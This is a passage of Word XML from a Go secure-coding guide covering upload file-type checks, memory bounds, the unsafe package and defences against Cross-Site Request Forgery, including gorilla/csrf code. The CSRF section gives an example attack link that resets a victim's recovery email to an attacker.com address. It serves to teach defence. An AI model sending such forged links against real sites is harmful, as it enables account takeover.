        <w:t xml:space="preserve">"image/jpg"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
  fmt.Println(filetype)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"image/gif"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
  fmt.Println(filetype)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"image/png"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
  fmt.Println(filetype)
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:
  fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"unknown file type uploaded"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
{...}
</w:t>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2"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r>
        <w:t>. And when a file is uploaded, scan the file for viruses and malware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="91" w:name="1___Go_1_8_does_allow_dynamic_loading_now__via_th___"/>
      <w:pPr>
        <w:pStyle w:val="Para 19"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>1</w:t>
        <w:t xml:space="preserve">. Go 1.8 does allow dynamic loading now, via </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>the new plugin mechanism</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:hyperlink w:anchor="1" w:tooltip="Jump back to footnote [1] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   If your application uses this mechanism, you should take precautions
   against user-supplied input.
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="92" w:name="Memory_Management"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Memory Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Input Validation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index2_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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2"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are not NULL terminated, and in the case of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>, its header consists of the following information:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringHeader </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    Data </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uintptr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    Len  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Despite this, boundary checks must be made (e.g. when looping). If we go beyond the set boundaries, Go will </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Panic</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Here's a simple example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    strings := []</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"aaa"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"bbb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"ccc"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"ddd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">}
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Our loop is not checking the MAP length -&gt; BAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">; i &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">; i++ {
        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(strings[i]) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
            fmt.Println(strings[i])
        }
    }
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">aaa
bbb
ccc
ddd
panic: runtime error: index out of range
</w:t>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2"/>
        </w:rPr>
        <w:t>Defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to perform these actions. Instructions in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are only executed when the surrounding functions finish execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">() {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Our cleanup code here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More information regarding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Defer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be found in the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index7_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Error Handling</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section of the document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usage of functions that are known to be vulnerable should also be avoided. In Go, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Unsafe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> package contains these functions. They should not be used in production environments, nor should the package be used as well. This also applies to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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0"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> possible to manually deallocate memory, although it is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> advised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>
        </w:rPr>
        <w:t xml:space="preserve">Quoting </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:tooltip="">
        <w:r>
          <w:t>Golang's Github</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text3"/>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pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="93" w:name="Cross_Site_Request_Forgery"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-Site Request Forgery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>OWASP's definition</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:t>Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>". (</w:t>
      </w:r>
      <w:hyperlink r:id="rId105" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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94" w:name="Attack_scenario"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Attack scenario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Let's say that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>foo.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uses HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requests to set the account's recovery email as shown:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GET https://foo.com/account/recover?email=me@somehost.com
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>A simple attack scenario may look like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim is authenticated at </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>https://foo.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker sends a chat message to the Victim with the following link:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">https://foo.com/account/recover?email=me@attacker.com
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Victim's account recovery email address is changed to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>me@attacker.com</w:t>
      </w:r>
      <w:r>
        <w:t>, giving the Attacker full control over it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="95" w:name="The_Problem"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>The Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Changing the HTTP verb from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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96" w:name="The_Solution"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>The Solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="97" w:name="In_theory"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>In theory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As previously mentioned, CSRF targets state-changing requests. Concerning Web Applications, most of the time that means </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requests issued by form submission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this scenario, when a user first requests the page which renders the form, the server computes a </w:t>
      </w:r>
      <w:hyperlink r:id="rId107" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>nonce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (an arbitrary number intended to be used once). This token is then included into the form as a field (most of the time this field is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but it is not mandatory).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next, when the form is submitted, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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8"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Unique per user session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Large random value</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generated by a cryptographically-secure random number generator </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Note:</w:t>
        <w:t xml:space="preserve"> Although HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are two other common targets of CSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="98" w:name="In_practice"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>In practice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>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08" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Gorilla web toolkit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for Go programming language. You can find </w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>gorilla/csrf on GitHub</w:t>
        </w:r>
      </w:hyperlink>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"net/http"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"github.com/gorilla/csrf"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"github.com/gorilla/mux"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    r := mux.NewRouter()
    r.HandleFunc(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/signup"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, ShowSignupForm)
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// All POST requests without a valid token will return HTTP 403 Forbidden.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    r.HandleFunc(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/signup/post"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, SubmitSignupForm)
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// Add the middleware to your router by wrapping it.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    http.ListenAndServe(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":8000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">,
        csrf.Protect([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"32-byte-long-auth-key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))(r))
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// PS: Don't forget to pass csrf.Secure(false) if you're developing locally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// over plain HTTP (just don't leave it on in production).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> ShowSignupForm(w http.ResponseWriter, r *http.Request) {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// signup_form.tmpl just needs a {{ .csrfField }} template tag for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// csrf.TemplateField to inject the CSRF token into. Easy!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    t.ExecuteTemplate(w, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"signup_form.tmpl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">{}{
        csrf.TemplateTag: csrf.TemplateField(r),
    })
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// We could also retrieve the token directly from csrf.Token(r) and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// set it in the request header - w.Header.Set("X-CSRF-Token", token)</w:t>
      </w:r>
